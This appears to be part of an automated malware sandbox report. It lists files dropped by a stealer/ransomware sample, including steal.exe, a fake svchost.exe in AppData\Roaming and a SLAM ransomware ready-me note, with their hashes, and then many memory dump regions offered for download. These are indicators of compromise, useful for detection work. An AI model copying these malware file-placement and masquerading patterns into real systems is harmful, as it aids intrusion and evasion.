156ead4b24858aa121ef28580245a7cfa2748b1bc2a6410dc77eb992760f56cc

SHA512
8be47b8857663b6fed5bd0e703ef2f1002c16196139a1096afe033b3dddfd73b37f09e72efd3b8f9e0ff3d40c2ff0e3a240769bb3d1c1197c4b04bfa9f5aed60

Download Submit
C:\Users\Admin\AppData\Roaming\steal.exe

Filesize
1001KB

MD5
ffe28a172874c48458e58dafdb1a6d3f

SHA1
02a66a5b2834fdf8c2098f98e225d464bda2cc9a

SHA256
e5c923b53444cb615241b272f4f4dc8553205478c14b02a71aeda7f1a7581547

SHA512
02969b275710698848006e7029717fe915490967b11395d1687c2ca556f4a593b5c3d89a8d5c5b21173ee0180c4dbf4ee5496cbd03b1ac154ab4e2ff9811942c

Download Submit
C:\Users\Admin\AppData\Roaming\steal.exe

Filesize
2.5MB

MD5
a3c5f703b7b768f760cbd2d899825277

SHA1
22e5277fcea3e0908bb4ed4f9f056b99bbef1440

SHA256
bca5d67886db9a84c0068ba5d1072befcf7f2567512374cee5f7c8cc0105cd4a

SHA512
8e65df98b580bf5c87c54867dcb3746c3ce0ba64af43716db684fc02b1fad2c206549e2acf4f702056263972605de52ab173c133dbc58c84ebf1e9638028af2c

Download Submit
C:\Users\Admin\AppData\Roaming\steal.exe

Filesize
674KB

MD5
fb3e5724fa4d60467deec00c7b0d7920

SHA1
2bb912b22a169a176e4d9b1d784963b632941b82

SHA256
6ddf258674d6798323a7452b8054d64432c3d0e65d9e27aaad14e6de27a5f854

SHA512
27ce842c28ec40831ab78f16f737ab194e342fc9792b439c472d331a6b18839b363a3ec9981fa996c2fb6c75a83fa3c13b28188a851ebaccd3d11c631f782abe

Download Submit
C:\Users\Admin\AppData\Roaming\svchost.exe

Filesize
41KB

MD5
84177654d8bbd32fe8132265e7a598ec

SHA1
73bbb239d1449b3af2d7f53614ba456c1add4c9a

SHA256
af531102bbb3238299b1f08916b67604984c370b7da902ef607a1c53dcbe3b73

SHA512
6d685bed743185098cf09cce535cd529e9b2a682b939dc1cc24ca85accb061e8ce4d479ebc91634c3ab12d42f77e2288ed75af572ff5fe701a4f2c0a61fb1048

Download Submit
C:\Users\Admin\AppData\Roaming\ucrtbased.dll

Filesize
940KB

MD5
a8393a35207b4cd6bb9d75e8ecf829fb

SHA1
cf9a5c05604a68a16c1864e9ebce668a2be9e333

SHA256
04c9440b96e903b61ad8a7d5894d1852ea28811441c6c6a1c62e682e2ad3324d

SHA512
27385551983ab7b95c18ff0bf7a92c0a248079a039c010a794180f098b7583af683c253cd0d341bb1e31ea78263bac02025e475e06023c34c1b03b31a950e63b

Download Submit
C:\Users\Admin\AppData\Roaming\ucrtbased.dll

Filesize
1.3MB

MD5
36d1262315e086ae8744d5ecfa8075ef

SHA1
ed7df6fe4d472d8f34701daeb58d65c85ca80847

SHA256
792ce4614d99b1bedab25c4f04189ea6b508f5cce43f5c42918e5703b5aa970a

SHA512
7f41e34029e2aa854d2bca8ae9d3f7e65be56bedc7d3dff4d26bd19706be122ce2cd87b25eaf76ca4b1e1be11c1fdc48b0c6d411dbe25ef8eca0d477e8967896

Download Submit
C:\Users\Admin\AppData\Roaming\ucrtbased.dll

Filesize
1.4MB

MD5
7a480e565291d77716b2df3a77c265d5

SHA1
860ecb2abbd54be6ad217601cb7262126f721304

SHA256
b0a8eba73f567608bd579925ab750e31be2541c6ae46443c29d7b4e0534233fe

SHA512
345dc0b3b4fb9e31f8929c2f77f07b0c4bd9386b7e5d43375545bc3805e85fc5eff7dc66deb6caa5dd9d8268f9439761298a6f66d5704ff793fcca5415f18091

Download Submit
C:\Users\Admin\Documents\OneNote Notebooks\README_SLAM_RANSOMWARE.txt

Filesize
2KB

MD5
a76976c793a38b05ded9e649a1b584c7

SHA1
21526022aa468f81b5190f3850d4064afcb64437

SHA256
1206430622b1768c7954a0e264f51198711ae0f4a2e23117dc7b0d5bcdf5f421

SHA512
695316c88ef9c8ce61811e3bf43bdc5bfe3d6ea66d3004346400992fa9e31279096813989fe363ae10ca1a89b3b5b5b5f7a4da383e7ef72dbea56c56c868d359

Download Submit
memory/224-47-0x00007FF9D7040000-0x00007FF9D7B01000-memory.dmp

Filesize
10.8MB

Download
memory/224-45-0x00000232C0810000-0x00000232C0820000-memory.dmp

Filesize
64KB

Download
memory/224-167-0x00000232DC200000-0x00000232DC3A9000-memory.dmp

Filesize
1.7MB

Download
memory/224-307-0x00007FF9D7040000-0x00007FF9D7B01000-memory.dmp

Filesize
10.8MB

Download
memory/1268-223-0x00000000076C0000-0x00000000076D0000-memory.dmp

Filesize
64KB

Download
memory/1268-859-0x00000000076C0000-0x00000000076D0000-memory.dmp

Filesize
64KB

Download
memory/1268-408-0x000000000BE80000-0x000000000C1D4000-memory.dmp

Filesize
3.3MB

Download
memory/1268-526-0x00000000076C0000-0x00000000076D0000-memory.dmp

Filesize
64KB

Download
memory/1268-398-0x000000000BA80000-0x000000000BB1C000-memory.dmp

Filesize
624KB

Download
memory/1268-6-0x00000000076C0000-0x00000000076D0000-memory.dmp

Filesize
64KB

Download
memory/1268-5-0x00000000077C0000-0x00000000077CA000-memory.dmp

Filesize
40KB

Download
memory/1268-0-0x0000000074860000-0x0000000075010000-memory.dmp

Filesize
7.7MB

Download
memory/1268-196-0x0000000074860000-0x0000000075010000-memory.dmp

Filesize
7.7MB

Download
memory/1268-402-0x000000000BBD0000-0x000000000BC80000-memory.dmp

Filesize
704KB

Download
memory/1268-407-0x000000000BB20000-0x000000000BB42000-memory.dmp

Filesize
136KB

Download
memory/1268-1-0x0000000000380000-0x0000000002D1A000-memory.dmp

Filesize
41.6MB

Download
memory/1268-2-0x0000000007D70000-0x0000000008314000-memory.dmp

Filesize
5.6MB

Download
memory/1268-3-0x00000000076F0000-0x0000000007782000-memory.dmp

Filesize
584KB

Download
memory/1268-405-0x000000000B300000-0x000000000B366000-memory.dmp

Filesize
408KB

Download
memory/1268-4-0x00000000076C0000-0x00000000076D0000-memory.dmp

Filesize
64KB

Download
memory/1844-905-0x00000248DD240000-0x00000248DD250000-memory.dmp

Filesize
64KB

Download
memory/1844-941-0x00000248E57E0000-0x00000248E57E1000-memory.dmp

Filesize
4KB

Download
memory/1844-921-0x00000248DD340000-0x00000248DD350000-memory.dmp

Filesize
64KB

Download
memory/1844-940-0x00000248E56D0000-0x00000248E56D1000-memory.dmp

Filesize
4KB

Download
memory/1844-939-0x00000248E56D0000-0x00000248E56D1000-memory.dmp

Filesize
4KB

Download
memory/1844-937-0x00000248E56A0000-0x00000248E56A1000-memory.dmp

Filesize
4KB

Download
memory/2080-855-0x0000000074860000-0x0000000075010000-memory.dmp

Filesize
7.7MB

Download
memory/2080-429-0x0000000074860000-0x0000000075010000-memory.dmp

Filesize
7.7MB

Download
memory/2080-430-0x0000000000D10000-0x0000000001C2A000-memory.dmp

Filesize
15.1MB

Download
memory/2080-524-0x0000000006510000-0x0000000006520000-memory.dmp

Filesize
64KB

Download
memory/4020-861-0x000000001BD10000-0x000000001BD20000-memory.dmp

Filesize
64KB

Download
memory/4020-514-0x00007FF9D7040000-0x00007FF9D7B01000-memory.dmp

Filesize
10.8MB

Download
memory/4020-494-0x0000000000CC0000-0x0000000000FE4000-memory.dmp

Filesize
3.1MB

Download
memory/4020-527-0x000000001BD10000-0x000000001BD20000-memory.dmp

Filesize
64KB

Download
memory/4020-857-0x00007FF9D7040000-0x00007FF9D7B01000-memory.dmp

Filesize
10.8MB

Download
memory/4020-594-0x000000001BCA0000-0x000000001BCF0000-memory.dmp

Filesize
320KB

Download
memory/4020-595-0x000000001C1D0000-0x000000001C282000-memory.dmp

Filesize
712KB

Download
memory/4324-26-0x00000000005C0000-0x00000000005E0000-memory.dmp

Filesize
128KB

Download
memory/4324-16-0x00000000005C0000-0x00000000005E0000-memory.dmp

Filesize
128KB

Download
memory/4776-46-0x0000000000400000-0x0000000000423000-memory.dmp

Filesize
140KB

Download
memory/5240-691-0x0000000074860000-0x0000000075010000-memory.dmp

Filesize
7.7MB

Download
memory/5240-590-0x0000000074860000-0x0000000075010000-memory.dmp

Filesize
7.7MB

Download
memory/5240-588-0x0000000000900000-0x0000000000C36000-memory.dmp

Filesize
3.2MB

Download
memory/5240-591-0x0000000005570000-0x0000000005580000-memory.dmp

Filesize
64KB

Download
memory/5348-710-0x0000000002F40000-0x0000000002F50000-memory.dmp

Filesize
64KB

Download
memory/5348-771-0x0000000074860000-0x0000000075010000-memory.dmp

Filesize
7.7MB

Download
memory/5348-766-0x0000000007E70000-0x0000000007E84000-memory.dmp

Filesize
80KB

Download
memory/5348-768-0x0000000007F50000-0x0000000007F58000-memory.dmp

Filesize
32KB

Download
memory/5348-767-0x0000000007F70000-0x0000000007F8A000-memory.dmp

Filesize
104KB

Download
memory/5348-765-0x0000000007E60000-0x0000000007E6E000-memory.dmp

Filesize
56KB

Download
memory/5348-745-0x0000000007EB0000-0x0000000007F46000-memory.dmp

Filesize
600KB

Download
memory/5348-746-0x0000000007E30000-0x0000000007E41000-memory.dmp

Filesize
68KB

Download
memory/5348-744-0x0000000007CA0000-0x0000000007CAA000-memory.dmp

Filesize
40KB

Download
memory/5348-742-0x0000000008270000-0x00000000088EA000-memory.dmp

Filesize
6.5MB

Download
memory/5348-743-0x0000000007C30000-0x0000000007C4A000-memory.dmp

Filesize
104KB

Download
memory/5348-740-0x0000000006EB0000-0x0000000006ECE000-memory.dmp

Filesize
120KB

Download
memory/5348-741-0x0000000007AE0000-0x0000000007B83000-memory.dmp

Filesize
652KB

Download
memory/5348-729-0x000000007F8A0000-0x000000007F8B0000-memory.dmp

Filesize
64KB

Download
memory/5348-730-0x000000006E430000-0x000000006E47C000-memory.dmp

Filesize
304KB

Download
memory/5348-728-0x0000000007AA0000-0x0000000007AD2000-memory.dmp

Filesize
200KB

Download
memory/5348-727-0x00000000069E0000-0x0000000006A2C000-memory.dmp

Filesize
304KB

Download
memory/5348-725-0x0000000006910000-0x000000000692E000-memory.dmp

Filesize
120KB

Download
memory/5348-708-0x0000000003330000-0x0000000003366000-memory.dmp

Filesize
216KB

Download
memory/5348-713-0x0000000006220000-0x0000000006286000-memory.dmp

Filesize
408KB

Download
memory/5348-711-0x0000000002F40000-0x0000000002F50000-memory.dmp

Filesize
64KB

Download
memory/5348-712-0x0000000005A60000-0x0000000006088000-memory.dmp

Filesize
6.2MB

Download
memory/5348-709-0x0000000074860000-0x0000000075010000-memory.dmp

Filesize
7.7MB

Download